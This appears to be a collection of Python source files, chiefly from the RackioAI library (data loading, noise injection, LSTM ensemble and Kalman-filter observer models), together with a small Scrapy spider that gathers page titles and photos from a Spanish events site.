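The closing comment in `sets.py` points out that `True` vanishes after deduplication because Python hashes `True` and `1` to the same set entry. A standalone illustration of that behaviour, independent of the file above:

```python
# bool is a subclass of int: True == 1 and hash(True) == hash(1),
# so a set keeps only whichever of the two values it saw first.
print({1, True})    # {1}
print({True, 1})    # {True}
print(0 in {False}, 1 in {True})  # True True: 0/False collapse the same way
```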
|
{
"source": "jesuscuesta/Python",
"score": 3
}
|
#### File: detalle/spiders/cogefotos.py
```python
import re
from scrapy.selector import HtmlXPathSelector
from scrapy.contrib.linkextractors.sgml import SgmlLinkExtractor
from scrapy.contrib.spiders import CrawlSpider, Rule
from detalle.items import DetalleItem
import urllib
filename = 'lista.txt'
class CogefotosSpider(CrawlSpider):
name = 'cogefotos'
allowed_domains = ['tucamon.es']
start_urls = []
    # Read the file that contains the listed URLs
f = open(filename).read()
for linea in f.split('\n'):
if linea != '':
            # Add each link to the URLs to examine
start_urls.append("http://www.tucamon.es" + linea)
def parse(self, response):
hxs = HtmlXPathSelector(response)
sites = hxs.select('//html')
items = []
for site in sites:
item = DetalleItem()
item['titulo'] = site.select("//head/title/text()").extract()
item['foto'] = site.select("//div[@class='photo_container photo_align_center']/img[1]/@src").extract()
item['descripcion'] = site.select("//div[@id='content']/p[2]").extract()
item['fecha'] = site.select("//div[@id='content']/p[3]").extract()
item['hora'] = site.select("//div[@id='content']/p[4]").extract()
items.append(item)
return items
CogefotosSpider()
```
|
{
"source": "JesusDBS/RackioAI",
"score": 2
}
|
#### File: RackioAI/rackio_AI/core.py
```python
import os
import pickle
from pickle import HIGHEST_PROTOCOL
import numpy as np
import pandas as pd
import doctest
from rackio_AI._singleton import Singleton
from rackio_AI.managers import DataAnalysisManager
from rackio_AI.managers import ModelsManager
from rackio_AI.managers import PreprocessManager
from rackio_AI.readers import Reader
from rackio_AI.utils.utils_core import Utils
class RackioAI(Singleton):
"""
This is the main class of the package.
**RackioAI** is an open source, MIT License [Rackio-Framework](https://github.com/rack-io/rackio-framework) extension
to do data analysis (based on [Pandas](https://pandas.pydata.org/)) and deep learning models (based on [Keras](https://keras.io/))
taking advantage of **Rackio** system architecture.
You can use it by the following snippet code:
```python
>>> from rackio_AI import RackioAI
```
"""
def __init__(self):
super(RackioAI, self).__init__()
self.reader = Reader()
self._preprocessing_manager = PreprocessManager()
self._data_analysis_manager = DataAnalysisManager()
self._models_manager = ModelsManager()
self.app = None
def __call__(self, app):
"""
:param app:
:return:
"""
self.app = app
def load(self, pathname: str, ext: str=".tpl", reset_index=False, **kwargs):
"""
Load data into DataFrame format:
* **.tpl:** Is an [OLGA](https://www.petromehras.com/petroleum-software-directory/production-engineering-software/olga-dynamic-multiphase-flow-simulator)
extension file.
* **.pkl:** Numpy arrays or Pandas.DataFrame saved in pickle format.
___
**Parameters**
* **:param pathname:** (str) Filename or directory.
* If the *pathname* is a directory, it will load all the files with extension *ext*.
* If the *pathname* is a filename, it will load the file with a supported extension.
* **:param ext:** (str) filename extension, it's necessary if pathname is a directory.
Extensions supported are:
* *.tpl* [OLGA](https://www.petromehras.com/petroleum-software-directory/production-engineering-software/olga-dynamic-multiphase-flow-simulator)
extension file.
* *.xls*
* *.xlsx*
* *.xlsm*
* *.xlsb*
* *.odf*
* *.ods*
* *.odt*
* *.csv*
* *.pkl* (Only if the pkl saved is a DataFrame)
**:return:**
* **data:** (pandas.DataFrame)
___
## Snippet code
```python
>>> import os
>>> from rackio_AI import RackioAI, get_directory
>>> filename = os.path.join(get_directory('Leak'), 'Leak01.tpl')
>>> df = RackioAI.load(filename)
>>> print(df.head())
tag TIME_SERIES PT_SECTION_BRANCH_TUBERIA_PIPE_Pipe60_NR_1 ... CONTR_CONTROLLER_CONTROL_FUGA file
variable Pressure ... Controller_output filename
unit S PA ... .tpl
0 0.000000 568097.3 ... 0.0 Leak01
1 0.502732 568098.2 ... 0.0 Leak01
2 1.232772 568783.2 ... 0.0 Leak01
3 1.653696 569367.3 ... 0.0 Leak01
4 2.200430 569933.5 ... 0.0 Leak01
<BLANKLINE>
[5 rows x 12 columns]
**Example loading a directory with .tpl files**
>>> directory = os.path.join(get_directory('Leak'))
>>> df = RackioAI.load(directory)
>>> print(df.head())
tag TIME_SERIES PT_SECTION_BRANCH_TUBERIA_PIPE_Pipe60_NR_1 ... CONTR_CONTROLLER_CONTROL_FUGA file
variable Pressure ... Controller_output filename
unit S PA ... .tpl
0 0.000000 568097.3 ... 0.0 Leak01
1 0.502732 568098.2 ... 0.0 Leak01
2 1.232772 568783.2 ... 0.0 Leak01
3 1.653696 569367.3 ... 0.0 Leak01
4 2.200430 569933.5 ... 0.0 Leak01
<BLANKLINE>
[5 rows x 12 columns]
**Example loading a directory with .csv files**
>>> directory = os.path.join(get_directory('csv'), "Hysys")
>>> df = RackioAI.load(directory, ext=".csv", _format="hysys")
>>> print(df.head())
(Time, [seconds]) (PIC-118 - PV, [kPa]) (PIC-118 - OP, [%]) (SPRDSHT-1 - Cell Matrix (G-16), []) (UIC-101 - OP, [%])
1 0 294.769 42 37.6105 10
2 0.3 294.769 42 37.6105 10
3 0.6 294.769 42 37.6105 10
4 0.9 294.769 42 37.6105 10
5 1.1 294.769 42 37.6105 10
>>> directory = os.path.join(get_directory('csv'), "VMGSim")
>>> df = RackioAI.load(directory, ext=".csv", _format="vmgsim")
>>> print(df.head())
(time, s) (/Bed-1.In.MoleFlow, kmol/h) (/Bed-1.In.P, kPa) ... (/Sep2.In.P, kPa) (/Sep3.In.P, kPa) (/Tail_Gas.In.T, C)
1 1 2072.582713 285.9299038 ... 315.8859771 291.4325134 159
2 2 2081.622826 286.9027793 ... 315.8953772 292.3627861 159
3 3 2085.98973 287.5966429 ... 316.0995398 293.0376745 159
4 4 2089.323383 288.1380485 ... 316.3974799 293.5708836 159
5 5 2092.214077 288.591646 ... 316.7350299 294.0200778 159
<BLANKLINE>
[5 rows x 16 columns]
**Example loading a .pkl with pandas.dataFrame**
>>> filename = os.path.join(get_directory('pkl_files'), 'test_data.pkl')
>>> df = RackioAI.load(filename)
>>> print(df.head())
Pipe-60 Totalmassflow_(KG/S) Pipe-151 Totalmassflow_(KG/S) Pipe-60 Pressure_(PA) Pipe-151 Pressure_(PA)
0 37.83052 37.83052 568097.3 352683.3
1 37.83918 37.70243 568098.2 353449.8
2 37.83237 37.67011 568783.2 353587.3
3 37.80707 37.67344 569367.3 353654.8
4 37.76957 37.69019 569933.5 353706.8
```
"""
filename, ext = Utils.check_path(pathname, ext=ext)
data = self.reader.read(filename, ext=ext, **kwargs)
self.columns_name = Utils.get_column_names(data)
if data.index.has_duplicates:
data = data.reset_index(drop=True)
if reset_index:
data = data.reset_index(drop=True)
self.columns_name = Utils.get_column_names(data)
self._data = data
return data
@property
def data(self):
"""
        Variable where the loaded data is stored.
**Parameters**
None
**:return:**
* **data:** (pandas.DataFrame)
"""
self.columns_name = Utils.get_column_names(self._data)
return self._data
@data.setter
def data(self, value):
"""
**Parameters**
* **:param value:** (pd.DataFrame or np.ndarray)
**:return:**
None
"""
if isinstance(value, pd.DataFrame) or isinstance(value, np.ndarray):
if hasattr(self, '_data'):
if isinstance(value, np.ndarray):
self._data = pd.DataFrame(value, columns=self.columns_name)
else:
if isinstance(self._data.columns, pd.MultiIndex):
self.columns_name = pd.MultiIndex.from_tuples(self.columns_name, names=['tag', 'variable', 'unit'])
self._data = value
else:
self.columns_name = Utils.get_column_names(value)
self._data = value
else:
raise TypeError('value must be a pd.DataFrame or np.ndarray')
def append(self, obj):
"""
        Append a RackioEDA, Preprocessing or RackioDNN object to its corresponding manager.
___
**Parameters**
* **:param obj:** (RackioEDA, Preprocessing, RackioDNN) objects.
**:return:**
None
___
## Snippet code
```python
>>> from rackio_AI import RackioEDA, Preprocessing
>>> EDA = RackioEDA(name='EDA', description='Object Exploratory Data Analysis')
>>> Preprocess = Preprocessing(name="Preprocessing", description="Preprocesing object")
```
"""
if "RackioEDA" in str(type(obj)):
self._data_analysis_manager.append(obj)
elif "Preprocessing" in str(type(obj)):
self._preprocessing_manager.append(obj)
elif "RackioDNN" in str(type(obj)):
pass
def get(self, name, _type='EDA', serialize=False):
"""
        Get any object coupled to RackioAI, such as a *RackioEDA*, *Preprocessing* or *RackioDNN* object,
        by its name.
___
**Parameters**
* **:param name:** (str) Object name
* **:param _type:** (str) Object type
* **'EDA':** refers to a *DataAnalysis* or *RackioEDA* object
* **'Preprocessing':** refers to a *Preprocessing* object
* **'Model':** refers to a **Model** machine learning or deep learning object
        * **:param serialize:** (bool) default=False, if True you get a serialized object, otherwise you get the object itself
**:return:**
* **object:** (object, serialized dict)
___
## Snippet code
```python
>>> from rackio_AI import RackioAI
>>> EDA = RackioAI.get("EDA", _type="EDA")
>>> Preprocess = RackioAI.get("Preprocess", _type="Preprocessing")
```
"""
if _type.lower() == 'eda':
data = self._data_analysis_manager.get(name)
if serialize:
return data.serialize()
return data
elif _type.lower() == 'preprocessing':
preprocess = self._preprocessing_manager.get(name)
if serialize:
return preprocess.serialize()
return preprocess
else:
            raise TypeError('It is not possible to get a {} object from RackioAI'.format(_type))
def get_manager(self, _type):
"""
Get a manager by its type.
___
**Parameters**
* **:param _type:** (str): Manager object type.
* *'EDA'*
* *'Preprocessing'*
* *'Models'*
**:return:**
* **result:** (obj) manager object
___
## Snippet code
```python
>>> from rackio_AI import RackioAI
>>> eda_manager = RackioAI.get_manager("EDA")
>>> preprocessing_manager = RackioAI.get_manager("Preprocessing")
```
"""
if _type.lower() == 'eda':
result = self._data_analysis_manager
elif _type.lower() == 'preprocessing':
result = self._preprocessing_manager
        elif _type.lower() == 'models':
            result = self._models_manager
        else:
            raise TypeError('It is not possible to get a {} manager from RackioAI'.format(_type))
        return result
def summary(self):
"""
Get RackioAI summary.
___
**Parameters**
None
**:returns:**
* **result:** (dict) All defined Managers
___
## Snippet code
```python
>>> from rackio_AI import RackioAI
>>> RackioAI.summary()
{'preprocessing manager': {'length': 1, 'names': ['Preprocessing'], 'descriptions': ['Preprocesing object'], 'types': ['regression']}, 'data analysis manager': {'length': 1, 'names': ['EDA'], 'descriptions': ['Object Exploratory Data Analysis']}}
```
"""
result = dict()
result["preprocessing manager"] = self._preprocessing_manager.summary()
result["data analysis manager"] = self._data_analysis_manager.summary()
return result
@staticmethod
def save(obj, filename, protocol=None, format='pkl'):
"""
Method to persist any object in pickle format
___
**Parameters**
* **:param obj:** (obj) any persistable object
* **:param filename:** (str) with no extension
* **:param format:** (str) with no dot (.) at the beginning (default='pkl')
**:return:**
* obj in the path defined by *filename*
"""
with open('{}.{}'.format(filename, format), 'wb') as file:
if protocol:
pickle.dump(obj, file, protocol=protocol)
else:
pickle.dump(obj, file, protocol=HIGHEST_PROTOCOL)
return obj
```
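`RackioAI.save` is a thin wrapper around `pickle.dump`, so any picklable object can be persisted; when the pickle holds a DataFrame it can later be read back through `RackioAI.load`. A short usage sketch (the file name below is illustrative):

```python
import pandas as pd
from rackio_AI import RackioAI

df = pd.DataFrame({
    'Pipe-60 Pressure_(PA)': [568097.3, 568098.2],
    'Pipe-151 Pressure_(PA)': [352683.3, 353449.8],
})

# Writes "leak_snapshot.pkl" in the current working directory using pickle's highest protocol.
RackioAI.save(df, 'leak_snapshot')

# Because the pickle contains a DataFrame, the regular loader can read it back.
df_again = RackioAI.load('leak_snapshot.pkl')
```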
#### File: rackio_AI/data_analysis/noise.py
```python
import numpy as np
import pandas as pd
from easy_deco.progress_bar import ProgressBar
from rackio_AI.utils.utils_core import Utils
from easy_deco.del_temp_attr import set_to_methods, del_temp_attr
class Noise:
"""
    Encapsulates methods to work with noise
"""
_instances = list()
def __init__(self):
Noise._instances.append(self)
def add(
self,
df: pd.DataFrame,
win_size: int=30,
method: str="rhinehardt",
cols: list=None,
std_factor: float=0.001
)-> pd.DataFrame:
"""
Add gaussian noise over subsequence windows based on some method
**Parameters**
* **:param df:** (pandas.DataFrame)
* **:param win_size:** (int) window size to apply gaussian noise
* **:param method:** (str) method to base gaussian noise
* *rhinehardt* or *rh*
* **:param cols:** (list) column names to add gaussian noise.
**returns**
* **df** (pandas.DataFrame) noise added
______
        ## Snippet code
```python
>>> import matplotlib.pyplot as plt
>>> from rackio_AI import Noise
>>> df = pd.DataFrame(np.random.randn(100,2), columns=["a", "b"])
>>> noise = Noise()
>>> df_noisy = noise.add(df, win_size=10)
>>> ax = plt.plot(df.index, df["a"], '-r', df.index, df["b"], '-b', df_noisy.index, df_noisy["a"], '--r', df_noisy.index, df_noisy["b"], '--b')
>>> ax = plt.legend(["a", "b", "noisy a", "noisy b"])
>>> plt.show()
```

"""
options = {
'win_size': win_size,
'method': method,
'std_factor': std_factor
}
self._df_ = df.copy()
if not cols:
cols = Utils.get_column_names(self._df_)
self.__first_step_add(cols, **options)
df = self._df_
return df
@ProgressBar(desc="Adding gaussian noise...", unit="columns")
def __first_step_add(self, col, **kwargs):
"""
Decorated function to visualize the progress bar during the execution of *add noise* method
**Parameters**
* **:param column_name:** (list)
**returns**
None
"""
win_size = kwargs['win_size']
windows_number = self._df_.shape[0] // win_size + 1
windows = np.array_split(self._df_.loc[:, col], windows_number, axis=0)
self._noise_ = list()
self.__last_step_add(windows, **kwargs)
self._df_.loc[:, col] = self._noise_
return
@ProgressBar(desc="Adding gaussian noise...", unit="windows")
def __last_step_add(self, window, **kwargs):
"""
Decorated function to visualize the progress bar during the execution of *add noise* method
**Parameters**
* **:param column_name:** (list)
**returns**
None
"""
method = kwargs['method']
if method.lower() in ["rhinehardt", "rh"]:
std_factor = kwargs['std_factor']
self._noise_.extend(self.rhinehardt(window, std_factor=std_factor))
return
def rhinehardt(self, x: pd.DataFrame, std_factor: float=1)->np.ndarray:
"""
Add noise to variable x based on Box-Muller transform
**Parameters**
        * **:param x:** (pandas.DataFrame) window of samples to perturb
        * **:param std_factor:** (float) fraction of the window mean used as the standard deviation when the sample standard deviation of the window is too small
        **returns**
        * **(numpy.ndarray)** the window values with added gaussian noise
"""
x = x.values
x = x.flatten()
rng = np.random.RandomState(seed=42)
r1, r2 = rng.uniform(size=len(x)), rng.uniform(size=len(x))
xmean = np.mean(x)
s = np.sqrt(np.sum((xmean - x)**2) / (len(x) - 1))
if s <= 1:
s = std_factor * xmean
d = s * np.sqrt(-2 * np.log(r1)) * np.sin(2 * np.pi * r2)
return x + d
if __name__ == "__main__":
import doctest
doctest.testmod()
```
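The perturbation in `rhinehardt` comes from the Box-Muller transform: for independent uniforms $r_1, r_2$ on $(0, 1)$, the quantity $\sqrt{-2\ln r_1}\,\sin(2\pi r_2)$ is a standard normal draw, so scaling it by $s$ produces zero-mean noise with standard deviation $s$. A quick numerical check of that property (standalone, not part of the package):

```python
import numpy as np

rng = np.random.RandomState(seed=42)
r1, r2 = rng.uniform(size=100000), rng.uniform(size=100000)

# Box-Muller: two uniform samples are mapped to one standard normal sample.
d = np.sqrt(-2 * np.log(r1)) * np.sin(2 * np.pi * r2)

print(d.mean(), d.std())  # close to 0 and 1 respectively
```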
#### File: rackio_AI/models/ensemble.py
```python
import tensorflow as tf
import matplotlib.pyplot as plt
import pandas as pd
import numpy as np
class RackioEnsembleLSTMCell(tf.keras.layers.Layer):
r"""
Documentation here
"""
def __init__(self, units, activation='tanh', return_sequences=False, **kwargs):
r"""
Documentation here
"""
super(RackioEnsembleLSTMCell, self).__init__(**kwargs)
self.units = units
self.rackio_ensemble_lstm_cell = tf.keras.layers.LSTM(units, activation=None, return_sequences=return_sequences, **kwargs)
self.activation = tf.keras.activations.get(activation)
def call(self, inputs):
r"""
Documentation here
"""
outputs = self.rackio_ensemble_lstm_cell(inputs)
norm_outputs = self.activation(outputs)
return norm_outputs
class EnsembleScaler:
r"""
Documentation here
"""
def __init__(self, scaler):
r"""
Documentation here
"""
self.input_scaler = scaler['inputs']
self.output_scaler = scaler['outputs']
def apply(self, inputs, **kwargs):
r"""
Documentation here
"""
# INPUT SCALING
samples, timesteps, features = inputs.shape
scaled_inputs = np.concatenate([
self.input_scaler[feature](inputs[:, :, feature].reshape(-1, 1)).reshape((samples, timesteps, 1)) for feature in range(features)
], axis=2)
# OUTPUT SCALING
if 'outputs' in kwargs:
outputs = kwargs['outputs']
samples, timesteps, features = outputs.shape
scaled_outputs = np.concatenate([
self.output_scaler[feature](outputs[:, :, feature].reshape(-1, 1)).reshape((samples, timesteps, 1)) for feature in range(features)
], axis=2)
return scaled_inputs, scaled_outputs
return scaled_inputs
def inverse(self, *outputs):
r"""
Documentation here
"""
result = list()
for output in outputs:
features = output.shape[-1]
samples = output.shape[0]
# INVERSE APPLY
scaled_output = np.concatenate([
self.output_scaler[feature].inverse(output[:, feature].reshape(-1, 1)).reshape((samples, features, 1)) for feature in range(features)
], axis=2)
result.append(scaled_output)
return tuple(result)
class RackioEnsemble(tf.keras.Model):
r"""
Documentation here
"""
def __init__(
self,
units,
activations,
scaler=None,
**kwargs
):
super(RackioEnsemble, self).__init__(**kwargs)
self.units = units
# INITIALIZATION
self.scaler = EnsembleScaler(scaler)
layers_names = self.__create_layer_names(**kwargs)
if not self.__check_arg_length(units, activations, layers_names):
raise ValueError('units, activations and layer_names must be of the same length')
self.activations = activations
self.layers_names = layers_names
# HIDDEN/OUTPUT STRUCTURE DEFINITION
self.__hidden_output_structure_definition()
# LAYERS DEFINITION
self.__hidden_layers_definition()
self.__output_layer_definition()
def call(self, inputs):
r"""
Documentation here
"""
x = inputs
# HIDDEN LAYER CALL
for layer_num, units in enumerate(self.hidden_layers_units):
acunet_layer = getattr(self, self.hidden_layers_names[layer_num])
x = acunet_layer(x)
# OUTPUT LAYER CALL
acunet_output_layer = getattr(self, self.output_layer_name)
return acunet_output_layer(x)
def compile(
self,
optimizer=tf.keras.optimizers.Adam(
learning_rate=0.1,
amsgrad=True
),
loss='mse',
metrics=tf.keras.metrics.MeanAbsoluteError(),
loss_weights=None,
weighted_metrics=None,
run_eagerly=None,
steps_per_execution=None,
**kwargs
):
r"""
Documentation here
"""
super(RackioEnsemble, self).compile(
optimizer=optimizer,
loss=loss,
metrics=metrics,
loss_weights=loss_weights,
weighted_metrics=weighted_metrics,
run_eagerly=run_eagerly,
steps_per_execution=steps_per_execution,
**kwargs
)
def fit(
self,
x=None,
y=None,
validation_data=None,
epochs=3,
callbacks=[
tf.keras.callbacks.EarlyStopping(
monitor='val_loss',
patience=3,
min_delta=1e-6,
mode='min')
],
plot=False,
data_section='validation',
**kwargs
):
r"""
Documentation here
"""
self._train_data = (x, y)
self._validation_data = validation_data
if self.scaler:
x_test, y_test = validation_data
x, y = self.scaler.apply(x, outputs=y)
validation_data = self.scaler.apply(x_test, outputs=y_test)
history = super(RackioEnsemble, self).fit(
x=x,
y=y,
validation_data=validation_data,
epochs=epochs,
callbacks=callbacks,
**kwargs
)
if plot:
if data_section.lower()=='validation':
x, y = validation_data
self.evaluate(x, y, plot_prediction=True)
return history
def predict(
self,
x,
**kwargs
):
r"""
Documentation here
"""
if self.scaler:
x = self.scaler.apply(x)
y = super(RackioEnsemble, self).predict(x, **kwargs)
if self.scaler:
y = self.scaler.inverse(y)[0]
return y
def evaluate(
self,
x=None,
y=None,
plot_prediction=False,
**kwargs
):
r"""
Documentation here
"""
evaluation = super(RackioEnsemble, self).evaluate(x, y, **kwargs)
if plot_prediction:
y_predict = super(RackioEnsemble, self).predict(x, **kwargs)
if self.scaler:
y_predict = self.scaler.inverse(y_predict)[0]
y = self.scaler.inverse(y)[0]
# PLOT RESULT
y = y.reshape(y.shape[0], y.shape[-1])
y_predict = y_predict.reshape(y_predict.shape[0], y_predict.shape[-1])
_result = np.concatenate((y_predict, y), axis=1)
result = pd.DataFrame(_result, columns=['Prediction', 'Original'])
result.plot(kind='line')
plt.show()
return evaluation
```
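`EnsembleScaler` expects `scaler['inputs']` and `scaler['outputs']` to be lists with one entry per feature, where each entry is callable on a `(samples * timesteps, 1)` column and also exposes an `inverse` method. Below is a minimal sketch of a compatible per-feature scaler; the class is hypothetical and not part of RackioAI:

```python
class MinMaxColumnScaler:
    """Per-feature min-max scaler with the interface EnsembleScaler assumes."""

    def __init__(self, x_min, x_max):
        self.x_min, self.x_max = x_min, x_max

    def __call__(self, column):
        # column arrives with shape (samples * timesteps, 1)
        return (column - self.x_min) / (self.x_max - self.x_min)

    def inverse(self, column):
        return column * (self.x_max - self.x_min) + self.x_min

# One scaler per input feature and per output feature, e.g. two inputs and one output:
scaler = {
    "inputs": [MinMaxColumnScaler(0.0, 10.0), MinMaxColumnScaler(100.0, 200.0)],
    "outputs": [MinMaxColumnScaler(0.0, 1.0)],
}
```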
#### File: rackio_AI/models/lstm_layer.py
```python
import tensorflow as tf
class RackioLSTMCell(tf.keras.layers.Layer):
r"""
Documentation here
"""
def __init__(self, units, activation='tanh', return_sequences=False, **kwargs):
r"""
Documentation here
"""
super(RackioLSTMCell, self).__init__(**kwargs)
self.units = units
self.rackio_lstm_cell = tf.keras.layers.LSTM(units, activation=None, return_sequences=return_sequences, **kwargs)
self.activation = tf.keras.activations.get(activation)
def build(self, input_shape):
r"""
Documentation here
"""
self._input_shape = input_shape
return super().build(input_shape)
def call(self, inputs):
r"""
Documentation here
"""
outputs = self.rackio_lstm_cell(inputs)
norm_outputs = self.activation(outputs)
return norm_outputs
def compute_output_shape(self, input_shape):
return super().compute_output_shape(input_shape)
def get_config(self):
r"""
Documentation here
"""
base_config = super().get_config()
return {
**base_config,
"units": self.units,
"input_shape": self._input_shape,
"activation": self.activation
}
```
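`RackioLSTMCell` wraps a linear Keras LSTM (`activation=None`) and applies the chosen activation afterwards, so it stacks like any other recurrent layer. A hedged usage sketch with illustrative layer sizes, assuming the import path matches the file header above:

```python
import tensorflow as tf
from rackio_AI.models.lstm_layer import RackioLSTMCell  # path taken from the file header above

model = tf.keras.Sequential([
    tf.keras.layers.InputLayer(input_shape=(10, 3)),               # 10 timesteps, 3 features
    RackioLSTMCell(32, activation='tanh', return_sequences=True),
    RackioLSTMCell(16, activation='tanh'),                          # final cell returns the last step only
    tf.keras.layers.Dense(1)
])
model.compile(optimizer='adam', loss='mse')
print(model.output_shape)  # expected: (None, 1)
```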
#### File: rackio_AI/models/observer.py
```python
import tensorflow as tf
import tensorflow_probability as tfp
import numpy as np
from rackio_AI.models.scaler import RackioDNNLayerScaler, RackioDNNLayerInverseScaler
from rackio_AI.models.gaussian_noise import RackioGaussianNoise
class RackioObserverDense(tf.keras.layers.Layer):
r"""
Documentation here
"""
def __init__(self, units, activation=None, **kwargs):
super().__init__(**kwargs)
self.units = units
self.activation = tf.keras.activations.get(activation)
def build(self, batch_input_shape):
r"""
Documentation here
"""
self.kernel = self.add_weight(
name="kernel",
shape=[batch_input_shape[-1], self.units],
initializer=tf.keras.initializers.RandomUniform(minval=-0.05, maxval=0.05, seed=None),
trainable=True
)
self.bias = self.add_weight(
name="bias",
shape=[self.units],
initializer=tf.keras.initializers.RandomUniform(minval=-0.05, maxval=0.05, seed=None),
trainable=True
)
super().build(batch_input_shape)
def call(self, X):
r"""
Documentation here
"""
return self.activation(X @ self.kernel + self.bias)
# def compute_output_shape(self, batch_input_shape):
# r"""
# Documentation here
# """
# return tf.TensorShape(batch_input_shape.as_list()[:-1] + [self.units])
def get_config(self):
r"""
Documentation here
"""
base_config = super().get_config()
return {
**base_config,
"units": self.units,
"activation": tf.keras.activations.serialize(self.activation)
}
class RackioObserverLSTM_f(tf.keras.layers.Layer):
r"""
Documentation here
"""
def __init__(self, units, activation='tanh', return_sequences=False, **kwargs):
r"""
Documentation here
"""
super(RackioObserverLSTM_f, self).__init__(**kwargs)
self.units = units
self.rackio_observer_lstm_cell = tf.keras.layers.LSTM(units, activation=None, return_sequences=return_sequences, **kwargs)
self.F = tf.Variable(np.zeros((1, 1)), dtype=tf.dtypes.float32)
self.rackio_dense_layer = RackioObserverDense(1, activation="tanh")
self.activation = tf.keras.activations.get(activation)
def build(self, input_shape):
r"""
Documentation here
"""
self.batch_size = 32
if input_shape[0]:
self.batch_size = input_shape[0]
super(RackioObserverLSTM_f, self).build(input_shape)
def call(self, inputs):
r"""
Documentation here
"""
        # First LSTM_f layer
outputs = self.rackio_observer_lstm_cell(inputs)
norm_outputs = self.activation(outputs)
# Dense layer
f_t = self.rackio_dense_layer(norm_outputs)
f = tf.reshape(f_t, (f_t.shape[1], f_t.shape[2]))
# f Jacobian
rows_f, cols_f = f.shape
        # If the LSTM_f output is a single variable, a gradient is computed rather than a full Jacobian
for i in range(cols_f):
for j in range(cols_f):
y_t = f[0, i]
y_t_1 = f[1, i]
x_k_1 = f[1, j]
x_k_2 = f[2, j]
self.F[i, j].assign((y_t - y_t_1) / (x_k_1 - x_k_2))
return f_t, f, self.F
class RackioObserverLSTM_Q(tf.keras.layers.Layer):
r"""
Documentation here
"""
def __init__(self, units, activation='tanh', return_sequences=False, **kwargs):
r"""
Documentation here
"""
super(RackioObserverLSTM_Q, self).__init__(**kwargs)
self.units = units
self.rackio_observer_lstm_cell = tf.keras.layers.LSTM(units, activation=None, return_sequences=return_sequences, **kwargs)
self.rackio_dense_layer = RackioObserverDense(1, activation="tanh")
self.activation = tf.keras.activations.get(activation)
def build(self, input_shape):
r"""
Documentation here
"""
self.batch_size = 32
if input_shape[0]:
self.batch_size = input_shape[0]
super(RackioObserverLSTM_Q, self).build(input_shape)
def call(self, inputs):
r"""
Documentation here
"""
        # First LSTM layer
outputs = self.rackio_observer_lstm_cell(inputs)
norm_outputs = self.activation(outputs)
# Dense layer
q_t = self.rackio_dense_layer(norm_outputs)
q = tf.reshape(q_t, (q_t.shape[1], q_t.shape[2]))
Q = tfp.stats.covariance(q, event_axis=1)
return Q
class RackioObserverLSTM_R(tf.keras.layers.Layer):
r"""
Documentation here
"""
def __init__(self, units, activation='tanh', return_sequences=False, **kwargs):
r"""
Documentation here
"""
super(RackioObserverLSTM_R, self).__init__(**kwargs)
self.units = units
self.rackio_observer_lstm_cell = tf.keras.layers.LSTM(units, activation=None, return_sequences=return_sequences, **kwargs)
self.rackio_dense_layer = RackioObserverDense(2, activation="tanh")
self.activation = tf.keras.activations.get(activation)
def build(self, input_shape):
r"""
Documentation here
"""
self.batch_size = 32
if input_shape[0]:
self.batch_size = input_shape[0]
super(RackioObserverLSTM_R, self).build(input_shape)
def call(self, inputs):
r"""
Documentation here
"""
        # First LSTM layer
outputs = self.rackio_observer_lstm_cell(inputs)
norm_outputs = self.activation(outputs)
# Dense layer
r_t = self.rackio_dense_layer(norm_outputs)
r = tf.reshape(r_t, (r_t.shape[1], r_t.shape[2]))
R = tfp.stats.covariance(r, event_axis=1)
return R
class RackioObserverLSTM_H(tf.keras.layers.Layer):
r"""
Documentation here
"""
def __init__(self, units, activation='tanh', return_sequences=False, **kwargs):
r"""
Documentation here
"""
super(RackioObserverLSTM_H, self).__init__(**kwargs)
self.units = units
self.rackio_observer_lstm_cell = tf.keras.layers.LSTM(units, activation=None, return_sequences=return_sequences, **kwargs)
self.rackio_dense_layer = RackioObserverDense(2, activation="tanh")
self.H = tf.Variable(np.zeros((2, 1)), dtype=tf.dtypes.float32)
self.activation = tf.keras.activations.get(activation)
def build(self, input_shape):
r"""
Documentation here
"""
self.batch_size = 32
if input_shape[0]:
self.batch_size = input_shape[0]
super(RackioObserverLSTM_H, self).build(input_shape)
def call(self, inputs, f):
r"""
Documentation here
"""
        # First LSTM layer
outputs = self.rackio_observer_lstm_cell(inputs)
norm_outputs = self.activation(outputs)
# Dense layer
h = self.rackio_dense_layer(norm_outputs)
# LSTM_H computation
rows_f, cols_f = f.shape
h_c = tf.reshape(h, (h.shape[1], h.shape[2]))
x = f
rows_h, cols_h = h_c.shape
for i in range(cols_h):
for j in range(cols_f):
h_t = h_c[0, i]
h_t_1 = h_c[1, i]
x_k_1 = x[1, j]
x_k_2 = x[2, j]
self.H[i, j].assign((h_t - h_t_1) / (x_k_1 - x_k_2))
h = h_c[0, :]
h = tf.reshape(h, (h.shape[0], 1))
return h, self.H
class RackioKF(tf.keras.layers.Layer):
r"""
Documentation here
"""
def __init__(self, **kwargs):
r"""
Documentation here
"""
super(RackioKF, self).__init__(**kwargs)
# y_t_corregido initialization
y_t_corregido = np.zeros((1, 1))
self.y_t_corregido = tf.Variable(y_t_corregido, dtype=tf.dtypes.float32)
# P_t initialization
p = np.zeros((1, 1))
self.P_t = tf.Variable(p, dtype=tf.dtypes.float32)
self.I = tf.eye(1, 1)
def build(self, input_shape):
r"""
Documentation here
"""
self.batch_size = 32
if input_shape[0]:
self.batch_size = input_shape[0]
super(RackioKF, self).build(input_shape)
def call(self, z, f, F, h, H, Q, R):
r"""
Documentation here
"""
F_t = tf.transpose(F)
H_t = tf.transpose(H)
# Prediction Step (Kalman Intro / Coskun)
P_t = tf.add( tf.matmul( tf.matmul(F, self.P_t), F_t), Q)
# Correction Step
K_t = tf.matmul( tf.matmul(P_t, H_t), tf.linalg.inv( tf.add( tf.matmul( tf.matmul(H, P_t), H_t), R)))
self.y_t_corregido.assign(tf.add( f[0, :], tf.matmul( K_t, tf.subtract(z, h))))
self.P_t.assign(tf.matmul(tf.subtract(self.I, tf.matmul(K_t, H)), P_t))
return self.y_t_corregido
class RackioObserver(tf.keras.Model):
r"""
Documentation here
"""
def __init__(
self,
units,
activations,
min_max_values=None,
add_gn: bool=True,
**kwargs
):
# INITIALIZATION
super(RackioObserver, self).__init__(**kwargs)
self.lstm_f = RackioObserverLSTM_f(units[0], activation=activations[0], return_sequences=True)
self.lstm_H = RackioObserverLSTM_H(units[3], activation=activations[3], return_sequences=True)
self.lstm_Q = RackioObserverLSTM_Q(units[1], activation=activations[1], return_sequences=True)
self.lstm_R = RackioObserverLSTM_R(units[2], activation=activations[2], return_sequences=True)
self.KF = RackioKF(**kwargs)
        self.scaler = None
        self.inverse_scaler = None
